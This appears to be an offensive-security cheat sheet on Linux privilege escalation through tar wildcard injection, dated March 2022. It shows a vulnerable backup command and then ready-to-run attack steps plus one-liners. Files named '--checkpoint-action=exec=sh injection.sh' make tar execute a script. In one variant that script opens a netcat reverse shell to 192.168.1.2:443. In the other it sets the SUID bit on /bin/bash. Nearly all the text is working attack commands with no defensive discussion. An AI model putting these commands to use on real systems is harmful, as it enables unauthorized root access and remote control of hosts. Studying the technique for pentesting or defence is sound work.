Wildcard

📆 Mar 1, 2022 • 💀 d4t4s3c • 📍 Linux (Privilege Escalation)
🏷️ linux linux-privilege-escalation wilcard wilcard-injection

Linux (Privilege Escalation)

Detect

cd /var/www/html && tar -zcf /var/backups/serve.tgz *

Abuse

Reverse Shell

user@victim:~$ cd /var/www/html/
user@victim:/var/www/html$ touch -- "--checkpoint=1"
user@victim:/var/www/html$ touch -- "--checkpoint-action=exec=sh injection.sh"
user@victim:/var/www/html$ echo -n 'nc 192.168.1.2 443 -e /bin/sh' > injection.sh
user@victim:/var/www/html$ chmod +x injection.sh

Oneliner

touch -- "--checkpoint=1" && touch -- "--checkpoint-action=exec=sh injection.sh" && echo -n 'nc 192.168.1.2 443 -e /bin/sh' > injection.sh && chmod +x injection.sh

SUID

user@victim:~$ cd /var/www/html/
user@victim:/var/www/html$ touch -- "--checkpoint=1"
user@victim:/var/www/html$ touch -- "--checkpoint-action=exec=sh injection.sh"
user@victim:/var/www/html$ echo -n 'chmod 4755 /bin/bash' > injection.sh
user@victim:/var/www/html$ chmod +x injection.sh

Oneliner

touch -- "--checkpoint=1" && touch -- "--checkpoint-action=exec=sh injection.sh" && echo -n 'chmod 4755 /bin/bash' > injection.sh && chmod +x injection.sh